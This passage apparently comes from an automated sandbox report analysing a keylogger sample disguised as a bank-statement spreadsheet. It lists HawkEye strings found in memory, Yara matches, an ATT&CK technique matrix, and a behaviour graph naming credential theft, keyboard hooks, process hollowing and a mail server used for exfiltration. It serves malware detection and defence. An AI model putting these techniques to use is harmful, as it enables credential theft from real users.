                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                Source: BANK-STATMENT _xlsx.exeString found in binary or memory: HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.801657269.0000000002A81000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger|9
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.884712791.0000000002AC1000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger|9
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger|9
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                Yara detected HawkEye KeyloggerShow sources
                Source: Yara matchFile source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803619602.0000000002F08000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.915989570.0000000003038000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885749429.0000000002F48000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Replication Through Removable Media1Windows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture221Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsShared Modules1Logon Script (Windows)Process Injection512Obfuscated Files or Information21Credentials in Registry2Account Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing41Credentials In Files1File and Directory Discovery1Distributed Component Object ModelEmail Collection1Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery39SSHInput Capture221Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsQuery Registry1VNCClipboard Data3Exfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncSecurity Software Discovery1101Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion6Proc FilesystemVirtualization/Sandbox Evasion6Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowProcess Discovery4Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingApplication Window Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureSystem Network Configuration Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 320625 Sample: BANK-STATMENT _xlsx.exe Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 74 201.75.14.0.in-addr.arpa 2->74 76 whatismyipaddress.com 2->76 114 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 14 other signatures 2->120 15 BANK-STATMENT _xlsx.exe 2->15         started        signatures3 process4 signatures5 154 Maps a DLL or memory area into another process 15->154 18 BANK-STATMENT _xlsx.exe 15->18         started        20 BANK-STATMENT _xlsx.exe 15 6 15->20         started        process6 dnsIp7 24 BANK-STATMENT _xlsx.exe 18->24         started        84 mail.iigcest.com 166.62.27.57, 49746, 49780, 587 AS-26496-GO-DADDY-COM-LLCUS United States 20->84 86 201.75.14.0.in-addr.arpa 20->86 88 2 other IPs or domains 20->88 124 Changes the view of files in windows explorer (hidden files and folders) 20->124 126 Writes to foreign memory regions 20->126 128 Allocates memory in foreign processes 20->128 130 3 other signatures 20->130 27 vbc.exe 1 20->27         started        29 vbc.exe 13 20->29         started        31 dw20.exe 23 6 20->31         started        signatures8 process9 signatures10 136 Maps a DLL or memory area into another process 24->136 33 BANK-STATMENT _xlsx.exe 24->33         started        35 BANK-STATMENT _xlsx.exe 6 24->35         started        138 Tries to steal Mail credentials (via file registry) 27->138 140 Tries to steal Instant Messenger accounts or passwords 27->140 142 Tries to steal Mail credentials (via file access) 27->142 process11 dnsIp12 39 BANK-STATMENT _xlsx.exe 33->39         started        78 201.75.14.0.in-addr.arpa 35->78 80 104.16.155.36, 443, 49764, 49774 CLOUDFLARENETUS United States 35->80 82 whatismyipaddress.com 35->82 122 Installs a global keyboard hook 35->122 42 dw20.exe 35->42         started        signatures13 process14 signatures15 132 Maps a DLL or memory area into another process 39->132 44 BANK-STATMENT _xlsx.exe 39->44         started        48 BANK-STATMENT _xlsx.exe 39->48         started        process16 dnsIp17 94 mail.iigcest.com 44->94 96 201.75.14.0.in-addr.arpa 44->96 98 whatismyipaddress.com 44->98 144 Writes to foreign memory regions 44->144 146 Allocates memory in foreign processes 44->146 148 Sample uses process hollowing technique 44->148 150 2 other signatures 44->150 50 vbc.exe 44->50         started        53 vbc.exe 44->53         started        55 dw20.exe 44->55         started        57 BANK-STATMENT _xlsx.exe 48->57         started        signatures18 process19 signatures20 106 Tries to steal Instant Messenger accounts or passwords 50->106 108 Tries to steal Mail credentials (via file access) 50->108 110 Tries to harvest and steal browser information (history, passwords, etc) 53->110 112 Maps a DLL or memory area into another process 57->112 59 BANK-STATMENT _xlsx.exe 57->59         started        61 BANK-STATMENT _xlsx.exe 57->61         started        process21 dnsIp22 65 BANK-STATMENT _xlsx.exe 59->65         started        100 201.75.14.0.in-addr.arpa 61->100 102 whatismyipaddress.com 61->102 152 Installs a global keyboard hook 61->152 68 dw20.exe 61->68         started        signatures23 process24 signatures25 104 Maps a DLL or memory area into another process 65->104 70 BANK-STATMENT _xlsx.exe 65->70         started        process26 dnsIp27 90 201.75.14.0.in-addr.arpa 70->90 92 whatismyipaddress.com 70->92 134 Installs a global keyboard hook 70->134 signatures28

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BANK-STATMENT _xlsx.exe40%VirustotalBrowse
                BANK-STATMENT _xlsx.exe42%ReversingLabsWin32.Trojan.LokiBot
                BANK-STATMENT _xlsx.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
